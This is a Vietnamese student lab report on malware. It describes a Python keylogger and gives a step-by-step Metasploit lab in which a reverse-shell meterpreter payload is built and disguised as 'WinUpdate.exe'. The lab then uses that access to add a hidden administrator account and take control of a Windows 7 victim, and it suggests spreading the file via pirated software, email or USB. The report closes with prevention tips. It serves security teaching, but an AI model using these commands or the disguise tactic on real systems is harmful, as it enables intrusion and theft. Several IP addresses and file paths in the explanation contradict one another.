- Keylogger có thể được cài đặt trên máy tính theo nhiều cách khác nhau, bao gồm: + Tải xuống và cài đặt phần mềm từ nguồn không đáng tin cậy + Mở tệp hoặc liên kết độc hại + Bị tấn công
Trang 1BỘ GIÁO DỤC VÀ ĐÀO TẠO TRƯỜNG ĐẠI HỌC SƯ PHẠM KỸ THUẬT TPHCM
KHOA: CÔNG NGHỆ THÔNG TIN
-oOo -BÁO CÁO
LAB 6: MALWARE
GVHD: THS.HUỲNH NGUYÊN CHÍNH
SVTH: NGUYỄN NHẬT NGUYÊN
MÃ SINH VIÊN: 22110384 HỌC KỲ: 1
TPHCM, Tháng 11 Năm 2024
Trang 2Lab 6 Malware
1 Keylogger
1.1 Giới thiệu về Keylogger
- Keylogger là một phần mềm hoặc thiết bị phần cứng có khả năng ghi lại mọi phím được nhấn trên bàn phím Thông tin này sau đó có thể được sử dụng để đánh cắp mật khẩu, thông tin tài chính và các thông tin cá nhân nhạy cảm khác
- Keylogger có thể được cài đặt trên máy tính theo nhiều cách khác nhau, bao gồm:
+ Tải xuống và cài đặt phần mềm từ nguồn không đáng tin cậy
+ Mở tệp hoặc liên kết độc hại
+ Bị tấn công bởi phần mềm độc hại
- Keylogger có thể gây ra nhiều thiệt hại, bao gồm:
+ Đánh cắp thông tin cá nhân và tài chính
+ Lạm dụng tài khoản trực tuyến
+ Tấn công lừa đảo
1.2 Lập trình ra Keylogger đơn giản bằng ngôn ngữ Python
Ngôn ngữ Python
Gói Listener trong thư viện Pynput
Giải thích: Đoạn mã Python trên là một trình theo dõi bàn phím đơn giản Nó sử dụng thư viện pynput để lắng nghe các sự kiện bàn phím và gọi lại hàm anonymous() mỗi khi một phím được nhấn Hàm anonymous() kiểm tra xem phím được nhấn có phải là phím F12 hay không Nếu là vậy, hàm sẽ gọi raise SystemExit(0) để thoát khỏi chương trình Nếu không, hàm sẽ in ra tên của phím được nhấn lên màn hình và ghi vào file nội dung được nhấn Để
sử dụng trình theo dõi bàn phím này, chúng ta chỉ cần chạy nó và sau đó nhấn bất kỳ phím nào trên bàn phím Tên của phím được nhấn sẽ được in ra lên màn hình Nếu bạn nhấn phím F12, chương trình sẽ thoát
Trang 3Kết quả sau khi chạy chương trình:
Vừa in ra ở console vừa ghi vào file
Trang 41.3 Một số chức năng khác của Keylogger
- Ngoài các chức năng chính là ghi lại toàn bộ bàn phím, hacker có thể tạo ra
keylogger có các chức năng hiện đại hơn như:
+ Ghi lại mọi phím được nhấn trên bàn phím, bao gồm cả phím tắt, phím chức năng
và phím mũi tên được định dạng theo chuẩn giúp hacker dễ đánh cắp thông tin
+ Lưu trữ thông tin đã ghi lại vào một tệp nhật ký hoặc gửi thông tin đó đến máy chủ
từ xa hoặc máy hacker
+ Có thể được sử dụng để đánh cắp mật khẩu, thông tin tài chính và các thông tin cá nhân nhạy cảm khác
+ Có thể được sử dụng để theo dõi hoạt động trực tuyến hay thói quen của người dùng
2 Malware (phần mềm độc lại)
2.1 Giới thiệu
Attacker sẽ phát tán các chương trình độc hại đến máy nạn nhân Khi máy nạn nhân
vô tình chạy chương trình độc hại của attacker thì attacker có thể điều khiển máy nạn nhân
2.2 Mục tiêu tấn công:
Usename/password các chương trình của mục tiêu
Lấy các tài liệu trên máy nạn nhân
Leo thang đặc quyền
Chạy các chương trình của Attacker
2.3 Công cụ sử dụng:
Metasploit
2.4 Thực hiện Lab
2.4.1 Chuẩn bị hệ thống
Tên Thiết bị Số lượng Ghi chú
PC Win 7
(192.168.74.135)
Backtrack 5 r3
(192.168.74.136) 1 Dùng cho Attacker
Lưu ý: Máy Windown 7 phải tắt tường lửa, các phần mềm diệt virus
Mô hình kết nối
Trang 52.4.2 Chuẩn bị Malware
Hack hệ thống: Sử dụng metasploit trong Kali
Bước 1: Kiểm tra IP của máy attacker bằng lệnh
$ ipconfig
(IP: 192.168.126.135)
Trang 6Bước 2: Sử dụng phần mềm Metasploit tạo Malware
- Sử dụng quyền root của Kali linux
$ sudo su
Nhập mật khẩu Kali
- Sử dụng phần mềm Metasplot tạo ra virus có tên WinUpdate.exe
# msf>msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.74.136 LPORT=4444 X >/root/WinUpdate.exe
Giải thích: Lệnh trên trong Kali là một lệnh của Metasploit Framework - một công cụ bảo mật được sử dụng để kiểm tra và khai thác các lỗ hổng bảo mật Cụ thể, các tùy chọn được sử dụng trong lệnh này là:
p Windows/meterpreter/reverse_tcp: Chọn payload là meterpreter cho hệ điều hành Windows và thiết lập kết nối ngược trở lại (reverse connection) với máy chủ của bạn
LHOST=192.168.74.136: Thiết lập địa chỉ IP của máy attacker của bạn LPORT=4444: Thiết lập cổng mà mà máy attacker sẽ lắng nghe
f exe: Chọn định dạng tệp tin đầu ra là exe /var/WinUpdate.exe: Thiết lập đường dẫn và tên tệp tin đầu ra Lệnh này sẽ tạo ra một tệp tin thực thi trên hệ điều hành Windows có tên là
WinUpdate.exe tại đường dẫn /var/ trên máy tính của attacker Tệp tin này sẽ kết nối đến máy chủ của bạn (được chỉ định bởi LHOST=192.168.74.136) và lắng nghe trên cổng 4444 (được chỉ định bởi LPORT=4444) Khi tệp tin này được chạy trên máy tính mục tiêu, nó sẽ kết nối đến máy attacker và cho phép máy attacker kiểm soát máy tính đó từ xa
Trang 7Kiểm tra virus đã được tạo hay chưa
Mở terminal mới
$ cd /var
$ ls
Thấy tệp tin chứa virus WinUpdate.exe đã được tạo thành công
Bước 3: Cấu hình Metasploit máy attacker để khai thác máy nạn nhân
Mở Metasploit Framework
# msfconsole
Lệnh này khởi động giao diện dòng lệnh của Metasploit Framework, cho phép bạn truy cập và làm việc với các module và tùy chọn của nó
Trang 8Cấu hình
use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.126.135
set LPORT 4444 show options exploit
Giải thích lệnh:
+ use exploit/multi/handler: Chọn module handler trong Metasploit Framework
+ set payload windows/meterpreter/reverse_tcp: Thiết lập payload là meterpreter cho hệ điều hành Windows và thiết lập kết nối ngược trở lại (reverse connection) với máy attacker
+ set LHOST 192.168.2.136: Thiết lập địa chỉ IP của máy attacker + set LPORT 4444: Thiết lập cổng mà máy attacker sẽ lắng nghe trên + show options: Hiển thị danh sách các tùy chọn mà chúng ta vừa thiết lập phía trên
+ exploit: Khởi động module và bắt đầu lắng nghe kết nối từ máy nạn nhân
Sau khi khởi động module thì nó sẽ lắng nghe kết nối từ máy nạn nhân nếu máy nạn nhân mở virus WindowsUpdate.exe thì máy attacker sẽ bắt được kết nối
Trang 9Bước 4: Thực hiện phát tán virus đến máy nạn nhân
Virus WindowsUpdate.exe có thể phát tán bằng nhiều cách vào máy nạn nhân Ví dụ như chèn vào phần mềm lậu, gửi qua email, tin nhắn hoặc truyền file từ usb sang máy nạn nhân,… Khi nạn nhân thấy file WindowsUpdate.exe thì nạn nhân sẽ khó phát hiện, không đề phòng và nghĩ chỉ là file cập nhật của Windows nên chạy bình thường Khi đó thì máy attacker sẽ kết nối đến máy nạn nhân, máy attacker đã có quyền kiểm soát máy nạn nhân
Giả sử ở đây Windows 7 ( máy nạn nhân) đã tải file virus WinUpdate.exe
Bước 5: Khai thác máy nạn nhân
Khi máy nạn nhân mở file virus WindowUpdate.exe
Trang 10Thì máy attacker sẽ kết nối, và máy attacker đã có quyền kiểm soát máy nạn nhân
Bây giờ máy Attacker có thể khai thác thông tin nạn nhân Nhập lệnh meterpreter >
help để hiển thị tất cả câu lệnh có thể thao tác lên máy nạn nhân Ví dụ như: chụp ảnh màn
hình, quay bằng webcam, tắt nguồn, hiển thị thông tin hệ thống, tạo file, …
Trang 11Hiển thị thông tin hệ thống
Attacker có thể xem thông tin hệ thống máy nạn nhân bằng lệnh
meterpreter > sysinfo
Xem các tiến trình đang chạy bằng lệnh
meterpreter > ps
Trang 12Chụp ảnh màn hình
Giả sử máy nạn nhân đang duyệt web, attacker có thể chụp ảnh màn hình và lấy thông tin quan trọng như tài khoản cá nhân, mật khẩu, hình ảnh,… Máy attacker có thể chụp ảnh màn hình máy nạn nhân bằng lệnh
meterpreter > screenshot
Tạo thư mục trên máy nạn nhân bằng lệnh
meterpreter > mkdir C:/hacker
Máy attacker
Trang 13Máy nạn nhân
Tạo user hacker với quyền administrators
meterpreter> shell net user hacker abc123 /add net localgroup administrators hacker /add
Tắt nguồn máy nạn nhân
Attacker có thể tắt nguồn máy nạn nhân bằng lệnh
meterpreter > shutdown
Trang 14Máy attacker
Máy nạn nhân
Ngoài ra còn nhiều thứ mà máy attacker có thể làm với máy nạn nhân
3 Dấu hiệu và cách phòng chống các phần mềm độc hại
3.1 Dấu hiệu máy tính của bạn có thể bị nhiễm phần mềm độc hại
- Máy tính chạy chậm
- Máy tính bị khởi động lại hoặc tắt đột ngột
- Bạn nhận được thông báo lỗi lạ
- Bạn thấy các cửa sổ bật lên quảng cáo không mong muốn
- Bạn thấy các chương trình mới được cài đặt mà bạn không nhớ đã cài đặt
- Phần mềm quét virus phát hiện nhưng phần mềm không đáng tin cậy
Trang 153.2 Một số cách phòng chống phần mềm độc hại
- Cài đặt phần mềm chống mã độc uy tín: Đây là cách phòng chống phần mềm độc hại hiệu quả nhất Phần mềm chống mã độc sẽ giúp phát hiện và loại bỏ phần mềm độc hại khỏi máy tính của bạn
- Cập nhật phần mềm thường xuyên: Các nhà sản xuất phần mềm thường xuyên phát hành các bản cập nhật để vá các lỗ hổng bảo mật Do đó, việc cập nhật phần mềm thường xuyên sẽ giúp máy tính của bạn được bảo vệ tốt hơn khỏi phần mềm độc hại
- Cẩn thận khi tải xuống và cài đặt phần mềm: Chỉ tải xuống và cài đặt phần mềm từ các nguồn đáng tin cậy Tránh tải xuống phần mềm miễn phí từ các trang web không rõ nguồn gốc
- Sử dụng mật khẩu mạnh: Mật khẩu mạnh sẽ giúp bảo vệ tài khoản của bạn khỏi bị tấn công Hãy sử dụng mật khẩu có ít nhất 8 ký tự, bao gồm chữ cái, số và ký tự đặc biệt
- Sao lưu dữ liệu thường xuyên: Sao lưu dữ liệu thường xuyên sẽ giúp bạn khôi phục
dữ liệu nếu bị mất hoặc bị hỏng do phần mềm độc hại